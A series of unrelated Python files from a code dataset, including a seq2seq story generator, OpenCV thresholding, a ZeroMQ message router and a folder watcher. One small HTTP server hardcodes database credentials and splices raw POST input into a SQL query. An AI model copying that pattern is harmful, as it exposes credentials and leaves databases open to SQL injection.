cnt2 += 1\n return dp[n]\n# 3. 출력부분\nn = int(input()) # n 받아서\ncnt1 = 0 # cnt 초기화\ncnt2 = 0 # cnt 초기화\nfib(n) # 재귀함수로 작동\nfibonacci(n) # dp로 작동\nprint(cnt1+1, cnt2) # 재귀함수 실행횟수, dp 실행횟수 출력. 
+1 because the recursive function calls itself","repo_name":"wjsrlahrlco1998/Coding-Test-Study","sub_path":"KiiiimDong/[BOJ]_알고리즘_수업-피보나치_수_1/[BOJ]_알고리즘_수업-피보나치_수_1.py","file_name":"[BOJ]_알고리즘_수업-피보나치_수_1.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
{"seq_id":"39148271172","text":"import collections\nimport io\nimport mxnet as mx\nfrom mxnet import autograd, gluon, init, nd\nfrom mxnet.contrib import text\nfrom mxnet.gluon import data as gdata, loss as gloss, nn, rnn\n\n\nPAD = '<pad>'\nBOS = '<bos>'\nEOS = '<eos>'\n\n\nnum_epochs = 500\neval_interval = 1\nlr = 0.01\nbatch_size = 20\nmax_seq_len = 50\nmax_test_output_len = 50\nencoder_num_layers = 1\ndecoder_num_layers = 2\nencoder_drop_prob = 0.1\ndecoder_drop_prob = 0.1\nencoder_embed_size = 256\nencoder_num_hiddens = 256\ndecoder_num_hiddens = 256\nalignment_size = 25\n\nctx = mx.gpu(0)\n\n\ndef read_data(max_seq_len):\n    input_tokens = []\n    output_tokens = []\n    input_seqs = []\n    output_seqs = []\n    with io.open('story_word.txt') as f:\n        lines = f.readlines()\n        for line in lines:\n            input_seq, output_seq = line.rstrip().split('\\t')\n            cur_input_tokens = input_seq.split(' ')\n            cur_output_tokens = output_seq.split(' ')\n            if len(cur_input_tokens) < max_seq_len and \\\n                            len(cur_output_tokens) < max_seq_len:\n                input_tokens.extend(cur_input_tokens)\n                # Append the EOS symbol at the end of the sequence.\n                cur_input_tokens.append(EOS)\n                # Add PAD symbols so that every sequence has equal length (max_seq_len).\n                while len(cur_input_tokens) < max_seq_len:\n                    cur_input_tokens.append(PAD)\n                input_seqs.append(cur_input_tokens)\n                output_tokens.extend(cur_output_tokens)\n                cur_output_tokens.append(EOS)\n                while len(cur_output_tokens) < max_seq_len:\n                    cur_output_tokens.append(PAD)\n                output_seqs.append(cur_output_tokens)\n        fr_vocab = text.vocab.Vocabulary(collections.Counter(input_tokens),\n                                         reserved_tokens=[PAD, BOS, EOS])\n        en_vocab = text.vocab.Vocabulary(collections.Counter(output_tokens),\n                                         reserved_tokens=[PAD, BOS, EOS])\n    return fr_vocab, en_vocab, input_seqs, output_seqs\n\n\ninput_vocab, output_vocab, input_seqs, output_seqs = read_data(max_seq_len)\nfr = nd.zeros((len(input_seqs), max_seq_len), ctx=ctx)\nen = nd.zeros((len(output_seqs), max_seq_len), ctx=ctx)\nfor i in range(len(input_seqs)):\n    fr[i] = nd.array(input_vocab.to_indices(input_seqs[i]), ctx=ctx)\n    en[i] = nd.array(output_vocab.to_indices(output_seqs[i]), ctx=ctx)\ndataset = gdata.ArrayDataset(fr, en)\n\n\n\nclass Encoder(nn.Block):\n    def __init__(self, num_inputs, embed_size, num_hiddens, num_layers,\n                 drop_prob, **kwargs):\n        super(Encoder, self).__init__(**kwargs)\n        with self.name_scope():\n            self.embedding = nn.Embedding(num_inputs, embed_size)\n            self.dropout = nn.Dropout(drop_prob)\n            self.rnn = rnn.GRU(num_hiddens, num_layers, dropout=drop_prob,\n                               input_size=embed_size)\n\n    def forward(self, inputs, state):\n        embedding = self.embedding(inputs).swapaxes(0, 1)\n        embedding = self.dropout(embedding)\n        output, state = self.rnn(embedding, state)\n        return output, state\n\n    def begin_state(self, *args, **kwargs):\n        return self.rnn.begin_state(*args, **kwargs)\n\n\nclass Decoder(nn.Block):\n    def __init__(self, num_hiddens, num_outputs, num_layers, max_seq_len,\n                 drop_prob, alignment_size, encoder_num_hiddens, **kwargs):\n        super(Decoder, self).__init__(**kwargs)\n        self.max_seq_len = max_seq_len\n        self.encoder_num_hiddens = encoder_num_hiddens\n        self.hidden_size = num_hiddens\n        self.num_layers = num_layers\n        with self.name_scope():\n            self.embedding = nn.Embedding(num_outputs, num_hiddens)\n            self.dropout = 
nn.Dropout(drop_prob)\n            # Attention mechanism.\n            self.attention = nn.Sequential()\n            with self.attention.name_scope():\n                self.attention.add(\n                    nn.Dense(alignment_size,\n                             in_units=num_hiddens + encoder_num_hiddens,\n                             activation='tanh', flatten=False))\n                self.attention.add(nn.Dense(1, in_units=alignment_size,\n                                            flatten=False))\n\n            self.rnn = rnn.GRU(num_hiddens, num_layers, dropout=drop_prob,\n                               input_size=num_hiddens)\n            self.out = nn.Dense(num_outputs, in_units=num_hiddens,\n                                flatten=False)\n            self.rnn_concat_input = nn.Dense(\n                num_hiddens, in_units=num_hiddens + encoder_num_hiddens,\n                flatten=False)\n\n    def forward(self, cur_input, state, encoder_outputs):\n        # When the RNN has multiple hidden layers, take the single-layer hidden state closest to the output layer.\n        single_layer_state = [state[0][-1].expand_dims(0)]\n        encoder_outputs = encoder_outputs.reshape((self.max_seq_len, -1,\n                                                   self.encoder_num_hiddens))\n        hidden_broadcast = nd.broadcast_axis(single_layer_state[0], axis=0,\n                                             size=self.max_seq_len)\n        encoder_outputs_and_hiddens = nd.concat(encoder_outputs,\n                                                hidden_broadcast, dim=2)\n        energy = self.attention(encoder_outputs_and_hiddens)\n        batch_attention = nd.softmax(energy, axis=0).transpose((1, 2, 0))\n        batch_encoder_outputs = encoder_outputs.swapaxes(0, 1)\n        decoder_context = nd.batch_dot(batch_attention, batch_encoder_outputs)\n        input_and_context = nd.concat(\n            nd.expand_dims(self.embedding(cur_input), axis=1),\n            decoder_context, dim=2)\n        concat_input = self.rnn_concat_input(input_and_context).reshape(\n            (1, -1, 0))\n        concat_input = self.dropout(concat_input)\n        state = [nd.broadcast_axis(single_layer_state[0], axis=0,\n                                   size=self.num_layers)]\n        output, state = self.rnn(concat_input, state)\n        output = self.dropout(output)\n        output = self.out(output).reshape((-3, -1))\n        return output, state\n\n    def begin_state(self, *args, **kwargs):\n        return self.rnn.begin_state(*args, **kwargs)\n\nclass DecoderInitState(nn.Block):\n    def __init__(self, encoder_num_hiddens, decoder_num_hiddens, **kwargs):\n        super(DecoderInitState, self).__init__(**kwargs)\n        with self.name_scope():\n            self.dense = nn.Dense(decoder_num_hiddens,\n                                  in_units=encoder_num_hiddens,\n                                  activation=\"tanh\", flatten=False)\n\n    def forward(self, encoder_state):\n        return [self.dense(encoder_state)]\n\ndef translate(encoder, decoder, decoder_init_state, fr_ens, ctx, max_seq_len):\n    for fr_en in fr_ens:\n        print('[input] ', fr_en[0])\n        input_tokens = fr_en[0].split(' ') + [EOS]\n        # Add PAD symbols so that every sequence has equal length (max_seq_len).\n        while len(input_tokens) < max_seq_len:\n            input_tokens.append(PAD)\n        inputs = nd.array(input_vocab.to_indices(input_tokens), ctx=ctx)\n        encoder_state = encoder.begin_state(func=nd.zeros, batch_size=1,\n                                            ctx=ctx)\n        encoder_outputs, encoder_state = encoder(inputs.expand_dims(0),\n                                                 encoder_state)\n        encoder_outputs = encoder_outputs.flatten()\n        # The decoder's first input is the BOS symbol.\n        decoder_input = nd.array([output_vocab.token_to_idx[BOS]], ctx=ctx)\n        decoder_state = decoder_init_state(encoder_state[0])\n        #print(encoder_state[0])\n        output_tokens = []\n\n        for _ in range(max_test_output_len):\n            decoder_output, decoder_state = decoder(\n                decoder_input, decoder_state, encoder_outputs)\n            pred_i = int(decoder_output.argmax(axis=1).asnumpy()[0])\n            # Once the EOS symbol is produced at any time step, the output sequence is complete.\n            if pred_i == output_vocab.token_to_idx[EOS]:\n                break\n            else:\n                output_tokens.append(output_vocab.idx_to_token[pred_i])\n            decoder_input = nd.array([pred_i], ctx=ctx)\n        print('[output]', ' '.join(output_tokens))\n        print('[expect]', fr_en[1], '\\n')\n\n\nloss = gloss.SoftmaxCrossEntropyLoss()\neos_id = output_vocab.token_to_idx[EOS]\n\ndef train(encoder, decoder, 
decoder_init_state, max_seq_len, ctx,\n          eval_fr_ens):\n    encoder.initialize(init.Xavier(), ctx=ctx)\n    decoder.initialize(init.Xavier(), ctx=ctx)\n    decoder_init_state.initialize(init.Xavier(), ctx=ctx)\n    encoder_optimizer = gluon.Trainer(encoder.collect_params(), 'adam',\n                                      {'learning_rate': lr})\n    decoder_optimizer = gluon.Trainer(decoder.collect_params(), 'adam',\n                                      {'learning_rate': lr})\n    decoder_init_state_optimizer = gluon.Trainer(\n        decoder_init_state.collect_params(), 'adam', {'learning_rate': lr})\n\n    data_iter = gdata.DataLoader(dataset, batch_size, shuffle=True)\n    l_sum = 0\n    for epoch in range(1, num_epochs + 1):\n        for x, y in data_iter:\n            cur_batch_size = x.shape[0]\n            with autograd.record():\n                l = nd.array([0], ctx=ctx)\n                valid_length = nd.array([0], ctx=ctx)\n                encoder_state = encoder.begin_state(\n                    func=nd.zeros, batch_size=cur_batch_size, ctx=ctx)\n                # encoder_outputs holds the encoder's hidden state at every time step.\n                encoder_outputs, encoder_state = encoder(x, encoder_state)\n                encoder_outputs = encoder_outputs.flatten()\n                # The decoder's first input is the BOS symbol.\n                decoder_input = nd.array(\n                    [output_vocab.token_to_idx[BOS]] * cur_batch_size,\n                    ctx=ctx)\n                mask = nd.ones(shape=(cur_batch_size,), ctx=ctx)\n                decoder_state = decoder_init_state(encoder_state[0])\n                #print(encoder_state[0])\n                for i in range(max_seq_len):\n                    decoder_output, decoder_state = decoder(\n                        decoder_input, decoder_state, encoder_outputs)\n                    # The decoder feeds the predicted word of the current time step in as the next time step's input.\n                    decoder_input = decoder_output.argmax(axis=1)\n                    valid_length = valid_length + mask.sum()\n                    l = l + (mask * loss(decoder_output, y[:, i])).sum()\n                    mask = mask * (y[:, i] != eos_id)\n                l = l / valid_length\n            l.backward()\n            encoder_optimizer.step(1)\n            decoder_optimizer.step(1)\n            decoder_init_state_optimizer.step(1)\n            l_sum += l.asscalar() / max_seq_len\n\n        if epoch % eval_interval == 0 or epoch == 1:\n            if epoch == 1:\n                print('epoch %d, loss %f, ' % (epoch, l_sum / len(data_iter)))\n            else:\n                print('epoch %d, loss %f, '\n                      % (epoch, l_sum / eval_interval / len(data_iter)))\n            if epoch != 1:\n                l_sum = 0\n            translate(encoder, decoder, decoder_init_state, eval_fr_ens, ctx,\n                      max_seq_len)\n\nencoder = Encoder(len(input_vocab), encoder_embed_size, encoder_num_hiddens,\n                  encoder_num_layers, encoder_drop_prob)\ndecoder = Decoder(decoder_num_hiddens, len(output_vocab),\n                  decoder_num_layers, max_seq_len, decoder_drop_prob,\n                  alignment_size, encoder_num_hiddens)\ndecoder_init_state = DecoderInitState(encoder_num_hiddens,\n                                      decoder_num_hiddens)\n\n\n\neval_fr_ens =[['were was told was understood decided make got', ' Dan\'s parents were overweight. Dan was overweight as well. The doctors told his parents it was unhealthy. His parents understood and decided to make a change. They got themselves and Dan on a diet.'],\n              ['had learned ride did have would sneak got crashed got', 'Carrie had just learned how to ride a bike. She didn\'t have a bike of her own. Carrie would sneak rides on her sister\'s bike. She got nervous on a hill and crashed into a wall. The bike frame bent and Carrie got a deep gash on her leg. '],\n              ['enjoyed decided go walking happened decided propose was upset did propose',' Morgan enjoyed long walks on the beach. She and her boyfriend decided to go for a long walk. After walking for over a mile, something happened. Morgan decided to propose to her boyfriend. Her boyfriend was upset he didn\'t propose to her first.'],\n              ['was working barged began yelling was taking did know react intervened calmed','Jane was working at a diner. Suddenly, a customer barged up to the counter. 
He began yelling about how long his food was taking. Jane didn\\'t know how to react. Luckily, her coworker intervened and calmed the man down.'],\n ['was talking continued complain flirting decided agree says listened got got asked can hang','I was talking to my crush today. She continued to complain about guys flirting with her. I decided to agree with what she says and listened to her patiently. After I got home, I got a text from her. She asked if we can hang out tomorrow.']]\n \n#eval_fr_ens =[['elle est japonaise .', 'she is japanese .'],\n# ['ils regardent .', 'they are watching .']]\n\ntrain(encoder, decoder, decoder_init_state, max_seq_len, ctx, eval_fr_ens)","repo_name":"AbnerCode/aws_Gluon_Story-Generation","sub_path":"CODE/8.6/Code/new_story_generation.py","file_name":"new_story_generation.py","file_ext":"py","file_size_in_byte":13590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18721301612","text":"def solution(survey, choices):\n answer = ''\n dic = { 'R':0, 'T':0, 'C':0, 'F':0, 'J':0, 'M':0, 'A':0, 'N':0 }\n for i,j in zip(survey, choices):\n if j < 4 :\n dic[i[0]] += 4 - (j%4)\n elif j > 4 :\n dic[i[1]] += j - 4 \n\n RCJA = ['R','C','J','A']\n TFMN = ['T','F','M','N']\n\n for x,y in zip(RCJA, TFMN):\n if dic[x] < dic[y] :\n answer += y \n else:\n answer += x \n \n return answer\n","repo_name":"JaeBumPark/code-test","sub_path":"프로그래머스/kmbti.py","file_name":"kmbti.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72729454942","text":"#1.9\n#import modules\nimport argparse\nimport cv2\nimport numpy as np\n\n#set up argument parser\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True,\n help = \"Path to the image file\")\nargs = vars(ap.parse_args())\n\n# Load the image and show it\nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"orig\", image)\n\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n#apply gaussian blur with a 7x7 kernel\nblurred = cv2.GaussianBlur(gray, (7, 7), 0)\n\n#basic thresholding using inversing\n#first param is the image we want to threshold\n#second param - is threshold check\n#if pixel is > threshold we set to black, otherwise we set to white\n#third param is output value of thresholding\n#any pixel greater than threshold then we set to the output value\n(T, thresh_inv) = cv2.threshold(blurred, 95, 255, cv2.THRESH_BINARY_INV)\ncv2.imshow(\"thresh binary inv\", thresh_inv)\n\n#normal thresholding\n(T, thresh) = cv2.threshold(blurred, 200, 255, cv2.THRESH_BINARY)\ncv2.imshow(\"thresh binary\", thresh)\n\n#visualize only the masked regions in the image\ncv2.imshow(\"output\", cv2.bitwise_and(image, image, mask=thresh_inv))\ncv2.waitKey(0)\n","repo_name":"dustin-thewind/computer-vision","sub_path":"simple_thresholding.py","file_name":"simple_thresholding.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41158793311","text":"#Head Material\n#leftPorts=0\n#rightPorts=0\n#done\n\n\n#Block Description\n'''\nAuthor: Kyle Norland\nDate: 10/5/20\nDescription: Boundary manager that rejects messages from internal ids\n'''\n#---------------------------------\n#-------------Imports---------\n#---------------------------------\nimport zmq\nimport json\nimport time\nimport sys\nfrom collections import deque\n\n#Defaults:\nproxyInputPort = 8000\nproxyOutputPort = 
9000\nsubTopics = ['cats']\npubTopics = ['bats']\ndata = \"value\"\nblockName = \"mid block--\"\n\nwith open(\"blockLogs/boundLog.txt\", \"w\") as logfile:\n logfile.write(str(time.localtime()))\n #------------------\n #--Pull arguments--\n #------------------\n numArgs = len(sys.argv)\n logfile.write(\"There are \" + str(numArgs) + \" arguments\" + \"\\n\")\n #print(\"There are \" + str(numArgs) + \" arguments\")\n\n if numArgs >= 3:\n proxyInputPort = int(sys.argv[1])\n proxyOutputPort = int(sys.argv[2])\n stringArchitecture = sys.argv[3]\n try:\n jsonArch = json.loads(stringArchitecture)\n subTopics = jsonArch['subTopics']\n pubTopics = jsonArch['pubTopics']\n blockName = jsonArch['blockName']\n participatingIps = jsonArch['participatingIps']\n internalIds = jsonArch['internalIds']\n externalSubs = jsonArch['externalSubs']\n computerIp = jsonArch['computerIp']\n #print(\"boundManager participating ips are: \" + str(participatingIps))\n #print(\"boundManager internal ids are: \" + str(internalIds))\n #print(\"computer ip is: \" + str(computerIp))\n except:\n logfile.write(\"Something in the json loading process broke\"+ \"\\n\")\n print(\"Something in the json loading process broke\")\n\n #------------------------------------------\n #-------Connect to the sockets (modified)--\n #------------------------------------------\n #polls: all local messages, external boundManagers (not self)\n #outputs to self, internal input.\n subSocketList = [] #All except for localProxySocket\n pubSocketList = []\n\n #ZMQ Context\n context = zmq.Context()\n\n #Set up poller (Some code from: https://learning-0mq-with-pyzmq.readthedocs.io/en/latest/pyzmq/multisocket/zmqpoller.html)\n poller = zmq.Poller()\n\n #Local Proxy\n localProxySocket = context.socket(zmq.SUB)\n localProxySocket.connect(\"tcp://127.0.0.1:\" + str(proxyOutputPort))\n localProxySocket.setsockopt_string(zmq.SUBSCRIBE, \"\")\n poller.register(localProxySocket, zmq.POLLIN)\n\n #Register external boundary managers\n for extBoundIp in participatingIps:\n if extBoundIp != computerIp: #Don't select self\n subSocket = context.socket(zmq.SUB)\n socketAddress = \"tcp://\" + str(extBoundIp) + \":\" + \"9846\"\n subSocket.connect(socketAddress)\n subSocket.setsockopt_string(zmq.SUBSCRIBE, \"\")\n subSocketList.append(subSocket)\n poller.register(subSocket, zmq.POLLIN)\n\n #Register publish sockets\n #Internal to the loopback ip on the proxy input port.\n internalPubSocket = context.socket(zmq.PUB)\n internalPubSocket.connect(\"tcp://127.0.0.1:\" + str(proxyInputPort))\n pubSocketList.append(internalPubSocket)\n\n #External to port 9846 on the local ip\n externalPubSocket = context.socket(zmq.PUB)\n externalPubSocket.bind(\"tcp://0.0.0.0:\" + \"9846\") #Bind since it's not connecting to proxy\n pubSocketList.append(externalPubSocket)\n\n #-------------------------------------------------------------\n #----------Run Loop (polls, checks and forwards)------------\n #-------------------------------------------------------------\n #Basic run pattern: Poll, (log), check against internal ids, publish\n print(\"starting loop\")\n while True:\n socks = dict(poller.poll(500))\n for socket in socks:\n topic = socket.recv_string()\n data = socket.recv_json()\n\n #Check if message is from internal, if it is, send out only local ids.\n if socket == localProxySocket:\n print(\"From local proxy socket: \" + str(topic))\n if topic in internalIds:\n externalPubSocket.send_string(topic, zmq.SNDMORE)\n externalPubSocket.send_json(data)\n\n #If message from external, 
don't allow local ids and check for known subscriptions\n            if socket != localProxySocket:\n                #print(\"Not from local proxy socket\")\n                if (topic not in internalIds) and (topic in externalSubs):\n                    #Forward to internal\n                    internalPubSocket.send_string(topic, zmq.SNDMORE)\n                    internalPubSocket.send_json(data)\n","repo_name":"kylenorland/casa","sub_path":"CASArchitect/blockLibrary/boundManager.py","file_name":"boundManager.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"18268491319","text":"import http.server\nfrom io import BytesIO\nimport mysql.connector\n\n\nclass HttpProcessor(http.server.BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(200)\n        self.send_header('content-type', 'text/html')\n        self.end_headers()\n        self.wfile.write(page)\n\n    def do_POST(self):\n        content_length = int(self.headers['Content-Length'])\n        body = self.rfile.read(content_length)\n        self.send_response(200)\n        self.end_headers()\n        date, currency = kurs_from_db(body.decode('utf-8'))\n        response = BytesIO()\n        response.write(b'USD on ' + date.encode() + b' = ' + str(currency[0]).encode() + b'\\n')\n        response.write(b'EUR on ' + date.encode() + b' = ' + str(currency[1]).encode() + b'\\n')\n        self.wfile.write(response.getvalue())\n\n\ndef kurs_from_db(body):\n    if 'calendar' in body:\n        date = body.replace('calendar=', '').replace('-', '.')\n    else:\n        return\n    conn = mysql.connector.connect(user=\"admin\", password=\"qwerty123qwerty123\", host=\"37.139.42.19\", port=3306, database=\"MySQL-8037\")\n    sql = conn.cursor()\n    # mysql.connector's cursor.execute() returns None, so fetch separately;\n    # MySQL uses STR_TO_DATE rather than Oracle's to_date.\n    sql.execute(\n        f\"select USD, EUR from Currency where DATE = STR_TO_DATE('{date}', '%Y.%m.%d')\"\n    )\n    db_response = sql.fetchone()\n    return date, db_response\n\n\npage = open(\"index.html\", \"rb\").read()\nserver = ('localhost', 80)\nHTTPD = http.server.HTTPServer(server, HttpProcessor)\nprint(f'server START on {server}')\nHTTPD.serve_forever()","repo_name":"ddlisicyn/Simple-HTTP-and-HTTPS-Servers","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"20823418350","text":"from functools import reduce\nclass Solution(object):\n    def letterCombinations(self, digits):\n        if '' == digits:\n            return []\n        kvmaps = {\n            '2' : 'abc',\n            '3' : 'def',\n            '4' : 'ghi',\n            '5' : 'jkl',\n            '6' : 'mno',\n            '7' : 'pqrs',\n            '8' : 'tuv',\n            '9' : 'wxyz'\n        }\n        return reduce(lambda acc, digit: [x + y for x in acc for y in kvmaps[digit]], digits, [''])\n\n\n    '''\n    Recursive approach:\n    mapping = {'2': 'abc', '3': 'def', '4': 'ghi', '5': 'jkl', \n               '6': 'mno', '7': 'pqrs', '8': 'tuv', '9': 'wxyz'}\n    if len(digits) == 0:\n        return []\n    if len(digits) == 1:\n        return list(mapping[digits[0]])\n    prev = self.letterCombinations(digits[:-1])\n    additional = mapping[digits[-1]]\n    return [s + c for s in prev for c in additional]\n    \n    '''","repo_name":"Dolantinlist/DolantinLeetcode","sub_path":"1-50/17_letter_combination.py","file_name":"17_letter_combination.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"7494906817","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 3\n# of the License, or (at your option) any later 
version.\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n\"\"\"\n HerbASAP - Herbarium Application for Specimen Auto-Processing\n performs post processing steps on raw format images of natural history\n specimens. Specifically designed for Herbarium sheet images.\n\"\"\"\n# imports here\nimport string\nfrom os import path\nimport time\n#import piexif\n\nfrom watchdog.events import PatternMatchingEventHandler\nfrom watchdog.observers import Observer\nfrom PyQt5 import QtCore\nimport cv2\n\n\nclass New_Image_Emitter(QtCore.QObject):\n new_image_signal = QtCore.pyqtSignal(object)\n\n\nclass Event_Handler(PatternMatchingEventHandler):\n \"\"\"\n Watchdog based Class to handle when new files are detected in the monitored\n folder.\n \"\"\"\n def __init__(self, parent, watch_dir, emitter=None, *args, **kwargs):\n super(Event_Handler, self).__init__(*args, **kwargs)\n PatternMatchingEventHandler.__init__(self, *args, **kwargs)\n self._emitter = emitter\n self.parent = parent\n self.watch_dir = watch_dir\n self.last_item = None\n self._emitEvents = ['created', 'renamed', 'modified', 'moved']\n self._removeEvents = ['deleted', 'moved']\n\n def on_any_event(self, event):\n \"\"\"\n attempts to handle the event based on the event type and destination\n \"\"\"\n event_type = event.event_type\n img_path = event.src_path\n img_filename, img_ext = path.splitext(img_path)\n # be sure the destination path is the focus\n if event_type in ['renamed', 'moved']:\n img_path = event.dest_path\n # if it is leaving the self.watch_dir, set self.last_item = None\n elif img_ext.lower() == '.tmp':\n return\n if (path.dirname(img_path) != self.watch_dir) or event.event_type in self._removeEvents:\n # if a file is moved out of self.watch_dir:\n if img_path == self.last_item:\n self.last_item = None\n # if the event is an emit event and has not been seen emit it.\n if (event_type in self._emitEvents) and (img_path != self.last_item):\n # first be sure it has finished arriving to the destination folder\n historicalSize = -1\n #waits = 1\n while (historicalSize != path.getsize(img_path)):\n historicalSize = path.getsize(img_path)\n # This solution could be improved\n time.sleep(.1)\n #print(f'you had to wait {waits} times')\n #waits += 1\n\n self._emitter.new_image_signal.emit(img_path)\n elif (event_type in self._removeEvents) and (img_path != self.last_item):\n # handle when the last image was removed for recapture\n self.last_item = ''\n # remember this was the last object seen.\n self.last_item = img_path\n return\n\n\nclass Folder_Watcher:\n def __init__(self, input_folder_path=None, raw_image_patterns=None):\n self.watch_dir = input_folder_path\n self.emitter = New_Image_Emitter()\n self.event_handler = Event_Handler(\n parent=self,\n watch_dir=self.watch_dir,\n emitter=self.emitter,\n patterns=raw_image_patterns,\n ignore_directories=True)\n self.is_monitoring = False\n\n def run(self):\n if self.is_monitoring:\n pass\n else:\n self.observer = Observer(timeout=0.2)\n self.is_monitoring = True\n # store the start time timer for use with get_runtime\n self.start_time = time.time()\n self.img_count = 0\n 
self.observer.schedule(self.event_handler, self.watch_dir)\n self.observer.start()\n\n def get_runtime(self):\n \"\"\"\n If self.is_monitoring, returns the runtime in decimal minutes,\n otherwise returns 0.00\n \"\"\"\n if self.is_monitoring:\n result = round((time.time() - self.start_time) / 60, 2)\n else:\n result = 0.00\n return result\n\n def stop(self):\n while (self.observer.event_queue.unfinished_tasks != 0):\n time.sleep(1)\n self.observer.stop()\n self.observer.join(timeout=.1)\n self.is_monitoring = False\n","repo_name":"CapPow/HerbASAP","sub_path":"libs/folderMonitor.py","file_name":"folderMonitor.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"7"} +{"seq_id":"20295882360","text":"from meshed import FuncNode, DAG\nimport streamlit as st\nfrom plunk.sb.front_experiments.streamlitfront_dataprep.data_prep2 import (\n data_from_wav_folder,\n data_from_csv,\n store_to_key_fvs,\n key_fvs_to_tag_fvs,\n mk_Xy,\n)\nfrom odat.mdat.vacuum import (\n DFLT_ANNOTS_COLS,\n DFLT_CHUNKER,\n DFLT_FEATURIZER,\n)\nfrom streamlitfront.examples.util import Graph\nfrom streamlitfront.elements import TextInput, SelectBox, FloatSliderInput\n\nfrom front.spec_maker_base import APP_KEY, RENDERING_KEY, ELEMENT_KEY, NAME_KEY\nfrom streamlitfront.base import mk_app\n\nDFLT_CHUNKER_MAKER = lambda: DFLT_CHUNKER\nDFLT_FEATURIZER_MAKER = lambda: DFLT_FEATURIZER\n\nFixedSizeChunker = DFLT_CHUNKER\nFeaturizer = DFLT_FEATURIZER\n\nif 'mall' not in st.session_state:\n st.session_state['mall'] = dict(\n # train_audio={},\n # tag={},\n # unused_store={\"to\": \"illustrate\"},\n global_input={}\n )\n\nmall = st.session_state['mall']\nmall['global_input'] = ['a name', 3]\n\n\ndef funcnode_maker(name):\n kwargs = metadata[name]\n return FuncNode(**kwargs)\n\n\ndef dag_maker(funcnames_list):\n func_nodes = list(map(funcnode_maker, funcnames_list))\n return DAG(func_nodes)\n\n\ndef f(msg):\n return msg + 'bob'\n\n\ndef g(x):\n return int(x) + 1\n\n\ndef mul(msg_out, multiplier):\n return msg_out * multiplier\n\n\nmetadata = {\n 'f': {'func': f, 'out': 'msg_out'},\n 'g': {'func': g, 'out': 'multiplier'},\n 'mul': {'func': mul, 'out': 'result'},\n}\n\n# Make a dag from only typing info\n# my_chunker: Chunker -->\nfuncnames_list = ['f', 'g', 'mul']\n\n\ndef delegate_input(input_nodes):\n dflt_val = {\n ELEMENT_KEY: SelectBox,\n 'options': mall['global_input'],\n }\n\n return {k: dflt_val for k in input_nodes}\n\n\nif __name__ == '__main__':\n\n dag = dag_maker(funcnames_list)\n var_nodes = dag.var_nodes\n print(var_nodes)\n nodes_list = ['x', 'msg']\n print(dag.synopsis_string())\n\n config_ = {\n APP_KEY: {'title': 'Simple Load and Display'},\n RENDERING_KEY: {\n DAG: {\n 'graph': {ELEMENT_KEY: Graph, NAME_KEY: 'Flow',},\n 'execution': {'inputs': delegate_input(nodes_list),},\n },\n },\n }\n\n app = mk_app([dag], config=config_)\n app()\n","repo_name":"otosense/plunk","sub_path":"plunk/sb/front_experiments/streamlitfront_dataprep/data_prep4.py","file_name":"data_prep4.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"40797138945","text":"import argparse, pickle, os\nimport torch.nn as nn\n#from torch import tensor, save, add, rand, floor, zeros, long\nimport torch\nimport torch.optim as optim\nimport numpy as np\n\nfrom .main import MainLinear, MainDeep\n\n\ndef train_linear(model):\n training_size = 100\n inputs = 
torch.rand(training_size, 2) # trains model with size of training_size with dimension 2\n    \n    labels = torch.zeros(training_size, 2, dtype=torch.float) # create output of same size\n\n    labels[:,1] = torch.floor(inputs[:,0]**2 + inputs[:,1]**2) # generates output of tensor \n    labels[:,0] = torch.add(-labels[:,1], 1) \n\n#    labels[:,0] = floor(inputs[:,0]**2 + inputs[:,1]**2) # generates output of tensor \n#    labels[:,1] = -labels[:,0] + 1\n\n    model = MainLinear()\n    criterion = nn.BCEWithLogitsLoss()\n\n    optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.9)\n\n    running_loss = 0.0\n\n    epochs = 10\n    for ep in range(epochs):\n        for i in range(0, 100):\n            model.train()\n            optimizer.zero_grad()\n#            print(\"session 1\")\n#            print(inputs, labels)\n            outputs, _ = model(inputs)\n            loss = criterion(outputs, labels)\n#            print(loss)\n\n            loss.backward()\n            optimizer.step()\n\n            running_loss += loss.item()\n        print('Epoch %d, loss:%.4f' % (ep+1, running_loss/100))\n        running_loss = 0\n    print('Model State --->')\n    print(model.state_dict())\n\n    # Save the trained model\n    dirname = os.path.dirname(os.path.abspath(__file__)) # Do NOT modify this line\n    torch.save(model.state_dict(), os.path.join(dirname, 'linear')) # Do NOT modify this line\n\ndef train_deep(model):\n    '''\n    Your code here\n    '''\n\n    # Save the trained model\n    dirname = os.path.dirname(os.path.abspath(__file__)) # Do NOT modify this line\n    torch.save(model.state_dict(), os.path.join(dirname, 